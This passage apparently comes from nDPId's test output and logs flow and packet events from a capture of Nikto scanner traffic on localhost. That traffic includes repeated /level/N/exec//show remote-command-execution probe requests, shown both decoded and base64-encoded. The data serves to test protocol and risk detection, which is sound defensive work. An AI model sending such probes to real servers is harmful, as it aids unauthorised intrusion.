+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_packet_id":1,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277703,"pkt":"AAAAAAAAAAAAAAAACABFAADIZuhAAEAG1UV\/AAABfwAAAcaAH5DHm1\/1JwgzKoAYAED+vAAAAQEICp1m\/u+dZv7vR0VUIC9sZXZlbC83OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277703,"flow_last_seen":1576420277703,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50816,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/79\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001326)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 